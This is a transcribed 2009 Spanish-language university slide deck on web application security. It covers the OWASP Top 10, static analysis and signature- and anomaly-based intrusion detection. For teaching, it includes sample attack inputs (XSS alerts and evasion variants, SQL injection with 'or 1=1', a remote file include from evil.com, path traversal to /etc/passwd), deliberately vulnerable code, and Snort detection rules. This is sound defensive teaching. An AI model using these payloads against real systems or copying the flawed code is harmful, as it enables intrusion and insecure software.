23-setiembre Cristian Cappo Facultad Politécnica, UNA

Tamaño: px
Comenzar la demostración a partir de la página:

Download "23-setiembre-2009. Cristian Cappo (ccappo@pol.una.py) Facultad Politécnica, UNA"

Transcripción

1 23-setiembre-2009 Cristian Cappo Facultad Politécnica, UNA En el marco de la VIII Exposición Tecnológica y Científica 2009

2 Cristian Cappo: Graduado de la Facultad Politécnica de la Universidad Nacional de Asunción (FPUNA) en Análisis de Sistemas Informáticos. Profesor de la FPUNA (desde el año 1999): Algoritmos y Estructura de Datos (Ing. Informática) Algoritmos (fundamentos de programación) (Ing. en Electrónica) Estructura de los lenguajes (Lic. en Ciencias Informáticas) Actualmente docente e investigador a tiempo completo de la Universidad Nacional de Asunción (DITCoDE ) y alumno de doctorado del Programa de Posgrado en Informática de la FPUNA (desde julio/2009)

3 1. Aplicaciones y arquitectura web 2. Problemas, vulnerabilidades y ataques 3. Lidiando con las vulnerabilidades 3.1 Análisis estático 3.2 Detección de intrusión. Generalidades 3.3 Detección de intrusión en aplicaciones web 4. Investigación en el área - FPUNA

4 Success is foreseeing failure El éxito es prever el fracaso Henry Petrosky Colapso del puente Tacoma Narrow (USA-1940)

5

6 Son aplicaciones que utilizan la infraestructura web para su funcionamiento, por ejemplo Internet. La web se ha convertido en el medio natural para desplegar los servicios de software Existen actualmente cerca de 30 mil millones de sitios web indexados (agosto/2009) por Google, Msn, Yahoo y Ask (www.worldwidewebsize.com). Es raro que un sitio web NO tenga al menos una aplicación que tenga capacidad de generar contenido dinámico y de recibir datos de sus potenciales usuarios.

7 Las aplicaciones para web son fáciles de construir, desarrollar y desplegar.

8 Ventajas Basado en un protocolo simple como HTTP (ligero y sin estado) Solo se requiere de un navegador (browser) Los navegadores ofrecen todo lo necesario para construir interfaces atractivas a los usuarios. Además es posible hacer parte (a veces bastante) del procesamiento del lado cliente. La tecnología y los entornos de desarrollo de las aplicaciones se están volviendo relativamente simples. Existen numerosas herramientas de acceso gratuito y otros recursos para incorporar a las aplicaciones propias.

9 Esquema básico/usual del entorno web Firewall Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80

10 Todas las transacciones HTTP siguen el mismo formato. Cada solicitud del cliente (request) y la respuesta del servidor (response) tienen tres partes: la línea request o response, una cabecera (header) y un cuerpo (body).

11 Métodos HTTP básicos Método Descripción Body? GET Solicitar un documento del servidor No HEAD Solicitar solo el header del servidor No POST Enviar datos al servidor para su procesamiento Si PUT Guardar el cuerpo del request en el servidor Si TRACE OPTIONS Mostrar la traza del mensaje a través de los proxys al server Determina que métodos están habilitados en el servidor DELETE Borra un documento del servidor No No No

12

13

14 HTTP no fue diseñado para aplicaciones El desarrollo de aplicaciones web es desordenado. Las aplicaciones web de por sí, no son seguras. La seguridad en esta área aún es joven. Generalmente los servidores web no proveen buenas herramientas de monitoreo. Existe una conciencia que esta aumentando pero hay un largo camino a recorrer.

15 Así como hay un aumento de número de aplicaciones también crecen los problemas de seguridad debido fundamentalmente a: Conocimientos insuficientes sobre seguridad Tiempo de desarrollo e implementación muy ajustados. Por tanto Aumento en número y severidad de los huecos de seguridad en las aplicaciones: AUMENTO DE VULNERABILIDADES.

16 Hacer lo correcto desde el principio es lo mejor Los desarrolladores deben diseñar y construir software seguro.!la seguridad es ahora parte de la programación! Pero No es posible 100% de seguridad. Se usa productos de terceros del que no se conoce su calidad y en particular su seguridad. Debemos convivir con sistemas que ya están funcionando (sistemas heredados)

17 Si es posible mejorar el software, debe hacerse! Pero es probable que se tenga que aumentar la seguridad desde el exterior y no es fácil. Se debe colocar aplicaciones inseguras en entornos seguros Debe usarse un modelo de amenazas en la implementación para determinar los huecos. Las deficiencias de arquitectura deben ser corregidas. Se debe limitar la exposición a través de un correcto diseño de red.

18 Aspectos a tener sobre seguridad: Monitoreo: Conocer que esta ocurriendo Buenas herramientas del sistema operativo Detección: Conocer cuando existe un ataque Intrusion Detection Systems Prevención: Detener el ataque antes que logre su objetivo Intrusion Prevention Systems Evaluación: Descubrir los problemas antes que los atacantes Análisis estático

19 Principios básicos de seguridad en las aplicaciones web No confiar en la entrada del usuario Revisar huecos de lógica Brindar solo la información necesaria Construir y probar para soportar la carga Carga potencial esperada Ataques de DoS (Denegación de servicio)

20 Firewall DataBase DataBase Cliente Web Servidor Web App - Web App - Web DataBase Tráfico HTTP GET /login.pl?user=http://hak.com/.. Puerto 80 El firewall no puede contrarrestar ataques que vienen en el contenido de los paquetes HTTP (que es puerto abierto)

21 Descubrimiento Examinar el entorno (nmap por ejemplo) Identificar puertos abiertos (port scan) Descubrimiento de tipo y versiones de las aplicaciones Generar y examinar errores Mediante entradas ridículas que provoquen errores Son útiles los errores de base de datos y los trazos de ejecución (stack trace). Encontrar información detrás (código fuente, comentarios, campos ocultos, etc). Definición del objetivo (target) Mecanismo de login Campos de entrada Manejo de sesiones (cookies) Infraestructura Y más

22 Qué es una vulnerabilidad? Es una debilidad o hueco de seguridad que posee una aplicación la que puede ser aprovechada o explotada de forma malintencionada por un atacante y violar así la seguridad del sistema.

23 Open Web Application Security Project (Proyecto Abierto de Seguridad en Aplicaciones Web)www.owasp.org Organización que se dedica a ayudar a entender y mejorar la seguridad en las aplicaciones y servicios web. OWASP Guide to Building Secure Web Applications, Lista las diez vulnerabilidades más importantes dadas en aplicaciones web. El último reporte es del OWASP Top Tiene relación con CVE (Common Vulnerability and Exposures ( cve.mitre.org ) ) : identificación, codificación y registro de vulnerabilidades. Cerca de 50% de las vulnerabilidades registradas corresponden a aplicaciones web.

24

25 1. Secuencia de Comandos en Sitios Cruzados (XSS). 2. Fallas de inyección 3. Ejecución de ficheros malintencionados 4. Referencia insegura y Directa a objetos 5. Falsificación de Petición de Sitios Cruzados (CSRF) 6. Revelación de información y gestión incorrecta de errores. 7. Pérdida de autenticación y gestión de sesiones. 8. Almacenamiento criptográfico inseguro. 9. Comunicaciones inseguras 10. Falla de restricción de acceso a URL.

26 1) Secuencia de Comandos en Sitios Cruzados (XSS) La aplicación puede ser usada como un mecanismo para transportar un ataque al usuario final con un navegador. El navegador del usuario no tiene forma de conocer que el script es no validado o malicioso, y lo ejecuta. Puede acceder a cookies, tokens de sesión o información sensible guardada en el navegador. Eventualmente pueden reescribir totalmente el contenido de la página HTML.

27 Pueden ser categorizados en dos clases Permanentes: Se guardan en el servidor, como por ejemplo una base de datos, en un foro, en un blog, comentario, etc. Requiere que la víctima acceda al sitio web contaminado. Reflejados El código inyectado es reflejado fuera del servidor, tal como un mensaje de error, resultado de búsqueda, o cualquier otra respuesta que incluya alguno o todas las entradas enviadas al servidor como parte de la petición.

28 Consideremos de siguiente script Perl $query = new CGI; Entrada no validada $directory = $query->param( msg ); print <html><body> <form action= displaytext.pl method= get > $msg <br> <input type= text name= txt > <input type= submit value= OK > </form></body></html> ; Si se le invoca text.pl?msg=hola Mundo entonces vemos lo siguiente:

29 El código anterior es vulnerable a XSS. La entrada no es validada por tanto puede inyectarse código en la página Si introducimos en el URL text.pl?msg=<script>alert( Hola )</script> <html><body> <form action="displaytext.pl" method="get"> <script> alert("hola") </script> <br> <input type="text" name="txt"> <input type="submit" value="ok"> </form></body></html>

30 Usuario hace login El usuario solicita el URL malicioso al servidor El server responde con el script del atacante El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario 5 El atacante envía un URL malicioso al usuario 2 6 El navegador del usuario envía el dato al atacante

31 Usuario hace login El usuario ve la respuesta del atacante El server responde con el script del atacante El atacante envía una respuesta conteniendo un script malicioso El atacante secuestra la sesión del usuario El script del atacante Se ejecuta en el navegador Del usuario 5 6 El navegador del usuario envía el dato al atacante

32 2) Fallas de inyección La inyección ocurre cuando los datos proporcionados por el usuario son enviados e interpretados como parte de una orden o consulta. Existen varios tipos: SQL, LDAP, XPath, XSLT, XML, ordenes de sistemas operativos entre otros. El más común es la inyección de sentencias o comandos SQL.

33 Permite a los atacantes retransmitir código a través de la aplicación web a otro sistema vía SQL. Para aprovechar una vulnerabilidad de este estilo el atacante debe encontrar un parámetro que la aplicación utiliza para construir una consulta SQL. Las consecuencias son varias: Obtener información privada Corromper o destruir el contenido de un base de datos Ejecutar comandos del sistema operativo Y otros..

34 Consideremos el siguiente código perl $query = new CGI; $username = $query->param( username ); $password = $query->param( password ); $sql_command = select * from users where username= $username and password= $password ; $sth = $dbh->prepare($sql_command) No validado

35 Un atacante podría aprovechar esta vulnerabilidad: Agregar or 1=1 en el campo password, de forma que la consulta queda select * from users where username= juan and password= or 1=1 De esta forma el atacante logro acceder a la aplicación.

36 Otros ejemplos de código vulnerable: En PHP $sql = "SELECT * FROM table WHERE id = '". $_REQUEST['id ]. " "; En Java String query = "SELECT user_id FROM user_data WHERE user_name = '" + req.getparameter("userid") + "' and user_password = '" + req.getparameter("pwd") +"'";

37 Otras palabras claves a detectar Exec XP_ Exec SP_ OpenRowSet Execute inmediate UNION SELECT INSERT DELETE UPDATE

38 3) Ejecución de ficheros malintencionados En muchas plataformas, el entorno de trabajo permite el uso de referencias a objetos externos, como URLs o referencias al sistema de ficheros. Cuando los datos no son comprobados correctamente, esto puede llevar a que se incluya, procese o ejecute contenido arbitrario hostil y remoto por el servidor Web.

39 Permite a un atacante Ejecución remota de código Instalación remota de rootkits y así controlar el sistema completo. Comúnmente se da en sistemas que usan PHP (inclusión remota de archivos). El daño causado es proporcional a la fortaleza del aislamiento de la plataforma del entorno de trabajo. El siguiente fragmento de código PHP es vulnerable a inclusión remota: include $_REQUEST['filename ]; programa.php?filename=http://evil.com/spam.txt?

40 4) Referencia insegura y Directa a objetos Ocurre cuando un programador expone una referencia hacia un objeto interno de la aplicación tales como un archivo, directorio, registro de la base de datos, o clave como un URL o un parámetro de formulario web

41 Ejemplo 1: <select name="language"> <option value="fr">français</option></select> require_once($_request['language ]."lang.php"); Este código puede ser atacado suministrando una cadena como../../../../etc/passwd%00 y acceder a archivos del sistema (fijarse que se inyectó el byte nulo %00 y así evitar que se añada otra cadena, lang.php en este caso)

42 Ejemplo 2: Un atacante puede explotar la vulnerabilidad probando con varios valores para una clave que está expuesta por la aplicación. int cartid = Integer.parseInt( request.getparameter("cartid" )); String query = "SELECT * FROM table WHERE cartid=" + cartid;

43 5) Falsificación de Petición de Sitios Cruzados (CSRF) Un ataque CSRF fuerza el navegador validado de una víctima a enviar una petición a una aplicación Web vulnerable, la que realiza la acción elegida a través de la víctima.

44 El usuario solicita al servidor la petición El server responde Usuario hace login a una aplicación El atacante utiliza el dato de la sesión del usuario para personalizarse 2 5 El usuario visita una página del atacante que tiene un CSFR El navegador del usuario envía el dato de la sesión al atacante

45 El servidor responde e incluye un cookie

46 El atacante ha inyectado un iframe

47 6) Revelación de información y gestión incorrecta de errores. Las aplicaciones pueden revelar, involuntariamente, información sobre su configuración, su funcionamiento interno, o pueden violar la privacidad a través de una variedad de problemas. Las aplicaciones Web suelen revelar información sobre su estado interno a través de mensajes de error detallados o de depuración. Esta información, a menudo, puede ser utilizada para lanzar, o incluso automatizar, ataques muy potentes.

48

49 7) Pérdida de autenticación y gestión de sesiones. Implican fallas en la protección de credenciales y tokens de sesión a través de su ciclo de vida. Se presentan habitualmente en las funciones auxiliares de autenticación como el cierre de sesión, gestión de contraseñas, expiración de sesión, recuérdame, pregunta secreta y actualización de la cuenta.

50 8) Almacenamiento criptográfico inseguro Se refiere a la falta de cifrar datos que son delicados ó aplicar algoritmos de criptografía mal diseñados. Ejemplo en PHP... $props = file('config.properties', FILE_IGNORE_NEW_LINES FILE_SKIP_EMPTY_LINES); $password = base64_decode($props[0]); $link = mysql_connect($url, $usr, $password); if (!$link) { die('could not connect: '. mysql_error()); }..

51 9) Comunicaciones inseguras Falta de uso de canales seguros como SSL que aseguren el cifrado de la comunicación y evitar que los atacantes puedan husmear en el tráfico de red.

52 10) Falla de restricción de acceso a URL. Se refiere a la protección que se debe dar a URLs que son delicadas. Normalmente solo se usa solo una restricción de visualización (seguridad por oscuridad) pero no es suficiente. Algunos ejemplos: URL ocultas o especiales suministradas solo a administradores. Archivos especiales ocultos. Código que evalúa privilegios en el cliente y no en el servidor.

53 Otras (en la versión OWASP 2004) - Desbordamiento de buffers (buffer overflow) - Su objetivo es corromper la pila de ejecución de una aplicación web y así poder ejecutar código malicioso. Normalmente aplicable a CGI y no a lenguajes interpretados (PHP, Perl, Java, JSP, etc). - Denegación de servicio (DoS) - Consumo de los recursos de tal forma que los usuarios lícitos no pueden acceder a los servicios. - Manejo inseguro de configuración - Configuración por defecto: usuarios, archivos, configuraciones, funciones.

54

55 En la etapa de desarrollo (estático) Utilizando analizadores estáticos de código En la etapa de producción (dinámico) Utilizando los detectores de intrusión

56

57 Permiten detectar vulnerabilidades en el proceso de construcción de la aplicación. Deben estar apoyados por una metodología que incluya revisiones de seguridad en cada etapa de construcción de la aplicación.

58 Existen herramientas que permiten encontrar vulnerabilidades (algunos ejemplos) LAPSE: Lightweight Analysis for Program Security in Eclipse (para Java) findbugs (para Java) Fortify Inc: https://opensource.fortify.com Bibliografía: Secure Programming with static analysis. Brian Chess and Jacob West

59 Fortify Sw Inc. posee una página interesante donde puede encontrarse una lista de errores de programación y diseño en varios lenguajes de programación (www.fortify.com/vulncat)

60

61 El número de incidentes de seguridad sigue creciendo, los administradores de redes y sistemas aplican de forma lenta las medidas correctivas. El desarrollo de mecanismos de seguridad como la autenticación y el control de acceso pueden ser deshabilitados como consecuencia de una mala configuración o de acciones maliciosas. Los usuarios de un sistema pueden abusar de sus privilegios y realizar acciones dañinas. Aún cuando un ataque no tuvo éxito es importante enterarse del intento.

62 Un sistema de detección de intrusión (IDS) es un software que detecta accesos sin autorización a una red de datos o un sistema computacional. Es capaz de detectar el tráfico malicioso en una red o el uso anormal de las computadoras. Un IDS es un entidad dinámica de monitoreo que complementa las habilidades de un firewall.

63 Organización de un IDS generalizado [Axelsson, 1998] Flujo de datos/control Respuesta a actividad intrusiva

64 Audit collection Recolectar los datos sobre la entidad monitoreada. Audit data storage: Módulo para guardar los datos que serán analizados. Analysis and detection Implementa los algoritmos de detección Configuration data Contiene información de configuración del detector. Por ejemplo: niveles de sensibilidad, tiempo de recolección, respuesta a las intrusiones, etc. Reference data Datos sobre ataques conocidos (signature) o perfil de funcionamiento del sistema (anomaly). Active/Processing data Datos de resultados parciales Alarm Es la parte que maneja la salida del IDS. Puede ser una respuesta automática a una intrusión o la emisión de una alerta al administrador de seguridad de la organización.

65 Firewall Servidor Web App - Web App - Web Servidor de Base de datos IDS Cliente Web Servidor Web App - Web App - Web Servidor de Base de datos Tráfico HTTP Puerto 80

66 Un IDS debe llenar los siguientes requerimientos [Dacier et al, 1999] Precisión No debe identificar una acción legítima como intrusiva (Una acción legítima identificada como falsa es llamada Falso- Positivo) Rendimiento Con posibilidad de reaccionar en tiempo real antes de que una intrusión tenga éxito. Completitud No debe fallar en detectar una intrusión (una intrusión no detectada es llamada falso-negativo). Tolerancia a fallas Un IDS debe ser resistente a ataques Escalabilidad: Un IDS debe ser capaz de procesar el número de eventos correspondiente al peor caso sin perder información.

67 Según su arquitectura NIDS ( Network IDS ) Se basan en el comportamiento de la red HIDS ( Host IDS ) Se basan en el comportamiento del servidor Según el abordaje de los algoritmos de detección Por plantilla o reglas (signature based) Por anomalía (anomaly based) Híbridos

68 Esta clasificación es debido a [Dacier et al, 1999] Método de detección Anomaly based y Signature based Comportamiento en la detección Pasivo y proactivo Localización de la fuente de auditoría NIDS y HIDS Frecuencia de uso Tiempo real y offline

69 Por plantilla o signature La información de auditoría que es analizada se compara con un conjunto predefinido de ataques (llamados plantillas o reglas o signatures). Ventajas Detección con bajo ratio de falsos positivos Identificación precisa del tipo de intrusión Protección inmediata De bajo consumo de recursos Desventajas Cada nuevo ataque requiere una actualización de la base de datos de plantillas No puede lidiar con ataques desconocidos o variaciones de los ya registrados (ataques polimórficos) La descripción de los ataques debe hacerse de forma muy precisa y detallada.

70 Por anomalía Se basan en que todas las actividades anómalas son maliciosas. Construyen un modelo del comportamiento normal, denominado perfil. Comparan entonces la información auditada con el perfil para establecer si existe o no una intrusión.

71 Detección por anomalía Ventajas Detección de ataques desconocidos Detección de ataques internos Es difícil para un atacante conocer a priori que actividad genera o no una alarma. Desventajas Generación de muchos falsos positivos El tiempo requerido para el entrenamiento El comportamiento de un ambiente monitoreado puede cambiar (luego del entrenamiento), por tanto se requiere re-entrenar. En el periodo de entrenamiento se puede incluir ataques.

72 Premisas de la detección por anomalía Una actividad intrusiva es un subconjunto de una actividad anómala. En un caso ideal coinciden. Pueden darse las siguientes combinaciones que caracterizan a un evento: Intrusivo pero no anómalo : falso negativo No intrusivo pero anómalo : falso positivo No intrusivo no anómalo: verdadero negativo Intrusivo y anómalo : verdadero positivo

73

74 Qué información necesitamos? Máquina origen Timestamp Método HTTP URI solicitado Paquete HTTP completo Un ataque puede encontrarse en: URI Cabecera HTTP del cliente Cookie En el cuerpo (consulta)

75 Detección por plantilla (signature) Es el método habitual y más sencillo de implementar. Dos principales detectores por signature existen en el mundo OpenSource - Snort (ww.snort.org) - mod_security (p/apache: Los de uso comercial son varios.

76 Detección por signature Ejemplo de una regla de SNORT para XSS Para un típico <script>alert(document.cookie)</script> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"web-misc cross site scripting attempt"; flow:to_server,established; content:"<script>"; nocase; classtype:web-application-attack; sid:1497; rev:6;) Para un típico ataque <img src=javascript> alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"web-misc cross site scripting HTML Image tag set to javascript attempt"; flow:to_server,established; content:"img src=javascript"; nocase; classtype:web-application-attack; sid:1667; rev:5;)

77 Detección por signature Lo anterior puede ser evadido <a href="javascript#[code]"> <div onmouseover="[code]"> <img src="javas cript:[code]"> <xml src="javascript:[code]"> <img src=base64(amf2yxnjcmlwda==)>

78 Detección por signature Podemos mejorar usando una expresión regular /((\%3D) (=))[^\n]*((\%3c) <)[^\n]+((\%3e) >) Chequea la ocurrencia de : = seguido de uno o mas \n seguido de < o su equivalente hex. cero o mas / seguido de > o su equivalente hex.

79 Inconvenientes de la detección por signature Los desarrolladores asumen que los campos ocultos no cambian. Por tanto no puede detectar si hubo o no manipulación en estos campos. Por ejemplo, no puede escribirse una regla, cuando se cambia de un valor 200 a 2 (suponiendo que el campo sea precio).

80 Inconvenientes en la detección por signature(2) Ataques de fuerza bruta (password, identificadores, usuarios, etc). Ejemplo:

81 Inconvenientes en la detección por signature(3) No es posible indicar una regla que pueda detectar vulnerabilidades relacionados a la lógica de la aplicación. En algunos casos es preciso un mejor mecanismo. Considere el siguiente ejemplo y suponga que se encuentra en un mail o en un foro: <scri<s<script>crip>>alert(document.cookie) </scri</script>ip> Qué debería hacer el detector?

82 Detección por anomalía Suelen complementar los detectores por signature Una sola técnica no puede abarcar todos los posibles ataques. Normalmente se utilizan varias técnicas. Alguna técnicas utilizadas estan basadas en: Modelos estadísticos Técnicas de Machine Learning y Data Mining Computación inmunológica Procesamiento de señales Métodos basados en especificación Análisis de estados

83 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 ( University of California, Santa Barbara) Uno de los trabajos más citados en el área específica Modelo de Datos (solo la cadena de consulta)

84 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) Modelo de detección Utiliza seis modelos de detección que identifica una entrada anómala en un conjunto asociado a un programa particular. Cada modelo genera un valor de probabilidad que indica si la entrada guarda relación con el perfil normal. Para determinar el valor final (score) se usa la siguiente fórmula Cada modelo opera en dos fases: entrenamiento y detección

85 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 Modelos: Longitud Distribución de caracteres Inferencia estructural Enumerador Presencia o ausencia de atributos Orden de los atributos

86 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 Longitud Se basa en el hecho de que la longitud de ciertos atributos es fija o su variación es pequeña. Distribución de caracteres Se basa en el hecho de que los valores de los parámetros tienen una distribución similar de caracteres.

87 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 Inferencia estructural Se basa en el hecho de que muchos atributos pueden ser generados como cadenas generadas por una gramática regular. Construye una gramática probabilística (Modelo de Markov) Enumerador Se basa en el hecho de que los valores de los atributos pueden tomar un conjunto finito de constantes.

88 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 Presencia o ausencia de atributos Se basa en que el procesamiento es usualmente resultado de una alta regularidad en el número, nombre y orden de los parámetros. Se detecta si el conjunto de parámetros se encuentra en el conjunto normal observado en la etapa de entrenamiento. Orden de los atributos La lógica de una aplicación es usualmente secuencial y por tanto el orden relativo de los parámetros se mantiene aun cuando un parámetro es omitido en la consulta.

89 Anomaly Detection of Web based Attacks (C. Kruegel & G. Vigna) 2003 Capacidad de detección

90 Using Generalization and Characterization Techniques in the Anomalybased Detection of Web Attacks (Robertson, Kruegel & Kemmerer) 2006 Basado en Anomaly Detection of Web based Attacks Se dispuso un mecanismo de generalización mediante un modelo abstracto que encuentra anomalías iniciales y similares. Para cada modelo se establece una medida de similaridad. Incluye capacidad de caracterizar los ataques en los siguientes tipos utilizando algunas heurísticas: Directory traversal Presencia de los caracteres. y / XSS Elementos de JS o HTML SQL Inyection Elementos de SQL Buffer Overflow Caracteres no ASCII

91 Using Generalization and Characterization Techniques in the Anomaly-based Detection of Web Attacks 2006

92 Using Generalization and Characterization Techniques in the Anomaly-based Detection of Web Attacks 2006

93 Otros trabajos en el área Swaddler: An Approach for the Anomaly-based Detection of State Violations in Web Applications (2007) Basado en estado de ejecución de las aplicaciones. The Essence of Command Injection Attacks in Web Applications (2006). Orientado a inyección de código (XSS, SQL inyection, etc) Data Mining for Intrusion Detection: from Outliers to true Intrusions (2009) Utiliza técnicas de Data Mining y separación de agrupación mediante wavelets.

94 Otros trabajos en el área (2) Spectrogram: A Mixture-of-Markov-Chains Model for Anomaly Detection in Web Traffic (2009) Learning DFA Representations of HTTP for Protecting Web Applications (2007) Boosting Web Intrusion Detection Systems by Inferring Positive Signatures (2008)

95 IDS distribuidos. Correlación de alarmas distribuida. Métricas globalmente aceptadas para determinar la eficiencia de los IDS. Conjunto de datos estandarizado para las pruebas. Dinamicidad de los cambios en las aplicaciones Automatización

96

97 Detección de intrusión en aplicaciones web Detector basado en anomalía En principio utilizando algunas aspectos del trabajo de Robertson & Kruegel. Utilización de técnicas del área de procesamiento de señales para detección de anomalías (ondeletas o wavelets). Trabajo presentado en el CNMAC 2009 (Congreso Nacional de Matemática Aplicada y Computacional, Cuiaba-BR)

98 En el marco de un proyecto conjunto de investigación con la Universidad Federal de Santa María (UFSM). Actualmente en desarrollo: Infraestructura de captura de datos para análisis real (sniffer). Reporte técnico sobre uso de transformadas wavelets para detección de longitudes anómalas en cadenas de consulta HTTP.

99

DETECCIÓN DE INTRUSIÓN POR ANOMALÍA EN APLICACIONES WEB

DETECCIÓN DE INTRUSIÓN POR ANOMALÍA EN APLICACIONES WEB DETECCIÓN DE INTRUSIÓN POR ANOMALÍA EN APLICACIONES WEB Cristian Cappo (ccappo@pol.una.py) Facultad Politécnica - UNA Laboratorio de Computación Científica y Aplicada En esta presentación 1. Aplicaciones

Más detalles

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py)

SEGURIDAD WEB. Cristian Cappo (ccappo@pol.una.py) SEGURIDAD WEB Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación y Desarrollo

Más detalles

Capítulo 2.- Vulnerabilidades en aplicaciones web.

Capítulo 2.- Vulnerabilidades en aplicaciones web. Capítulo 2.- Vulnerabilidades en aplicaciones web. En este capítulo se explican algunas vulnerabilidades en aplicaciones web que pueden ser explotadas por software o por personas malintencionadas y como

Más detalles

Seguridad en Aplicaciones Web

Seguridad en Aplicaciones Web Seguridad en Aplicaciones Web Leandro Meiners lmeiners@cybsec cybsec.comcom Septiembre de 2005 Buenos Aires - ARGENTINA Temario Temario Introducción al Protocolo HTTP: Arquitectura, carácterísticas, autenticación,

Más detalles

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team

Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Web : Ataque y Defensa. Claudio Salazar Estudiante Ing. Civil Informática UTFSM Pinguinux Team Temario 1. Introducción 2. Cross Site Scripting (XSS) 3. Inyección SQL 4. Nuestro código en el servidor 5.

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso

VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL. AUTOR: Chema Alonso VÍDEO intypedia007es LECCIÓN 7: SEGURIDAD EN APLICACIONES WEB. INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL AUTOR: Chema Alonso Consultor de Seguridad en Informática 64. Microsoft MVP Enterprise Security

Más detalles

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US

Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Sobre mi Formación Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Máster en Seguridad de las TIC - US Experiencia Aficiones 4+ años como desarrollador web, más de 2 en Drupal

Más detalles

Técnicas y Procedimientos para la realización de Test de Intrusión

Técnicas y Procedimientos para la realización de Test de Intrusión Extrelan 2008 Cáceres. Marzo de 2008 Técnicas y Procedimientos para la realización de Test de Intrusión SG6 Soluciones Globales en Seguridad de la Información http://www.sg6.es INDICE DE CONTENIDOS Primera

Más detalles

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet

Hacking Ético Web. I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com. @ciyinet Hacking Ético Web I Jornadas Tecnológicas CEEPS 27-03-2012 Carlos García García i52gagac@uco.es ciyinet@gmail.com @ciyinet Índice Introducción OWASP OWASP Top 10 (2010) Demostración ataques Inyección SQL

Más detalles

Ataques XSS en Aplicaciones Web

Ataques XSS en Aplicaciones Web Ataques XSS en Aplicaciones Web Education Project Antonio Rodríguez Romero Consultor de Seguridad Grupo isoluciones antonio.rodriguez@isoluciones.es Copyright 2007 The Foundation Permission is granted

Más detalles

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento

Ataques más comunes. Virginia Armas Alejandro Do Nascimiento Ataques más comunes Virginia Armas Alejandro Do Nascimiento 1 Introducción Los ataques a desarrollar en la exposición son: HTTP Tunneling Suplantación de contenido Local File Inclusion Remote File Inclusion

Más detalles

A1-Inyección (SQL,OS Y LDPA)

A1-Inyección (SQL,OS Y LDPA) Los Diez Riesgos Más Importantes en Aplicaciones WEB Top 10-2010 A1-Inyección (SQL,OS Y LDPA) Oscar William Monsalve Luis Alberto Suarez Jorge Eliecer Betancur Diana Marcela Usuga G. Contenido Presentación

Más detalles

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Seguridad en Sistemas Informáticos (SSI) Programación Segura 1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP

Más detalles

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014

Roberto Garcia Amoriz. Iniciándose en XSS. c_b_n_a. Leganés 6-7 Febrero 2014 Roberto Garcia Amoriz Except where otherwise noted, this work is licensed under: http://creativecommons.org/licenses/by-nc-sa/3.0/ c_b_n_a QUIEN SOY Roberto García Amoriz: trabajaba como Administrador

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

Sistemas de Detección de Intrusos

Sistemas de Detección de Intrusos Tema S11 Actualizado 10-05-2011 Sistemas de Detección de Intrusos Álvaro Alesanco alesanco@unizar.es Criptografía y Seguridad en Redes de Comunicaciones Índice! Introducción! Usos de un IDS! Tipos de IDS!

Más detalles

Hacking ético y Seguridad en Red

Hacking ético y Seguridad en Red TFC: Administración de Redes y Sistemas Operativos Hacking ético y Seguridad en Red Alumno: Cristiano Dias Consultor: José Manuel Castillo Pedrosa 1 Índice Introducción... 3 Perfil del Hacker ético...

Más detalles

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas

Más detalles

